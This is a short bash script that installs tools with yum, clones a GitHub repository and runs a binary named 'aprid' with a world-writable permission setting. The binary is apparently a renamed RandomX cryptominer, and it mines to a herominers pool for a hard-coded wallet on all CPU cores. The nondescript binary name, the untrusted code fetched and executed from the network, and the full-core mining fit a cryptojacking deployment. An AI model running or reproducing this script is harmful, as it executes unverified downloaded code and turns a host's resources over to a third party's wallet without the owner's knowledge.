#!/bin/bash
yum update && yum -y install sudo
yum -y install git wget
git clone https://github.com/nonibihan/luo.git && cd luo
chmod 777 aprid SHA256SUMS
./aprid --donate-level 1 -o sg.salvium.herominers.com:1230 -u SaLvs6xH5qeV5j4DTgCFCmdE9Sgix5QcJfravWBbsgDJDGJ9YqgMcLxFALARL4eoN5JEjds8GcjPnXRfKFruYGeRNyDKdhsm3dC -p latud -a rx/0 -k -t $(nproc --all)
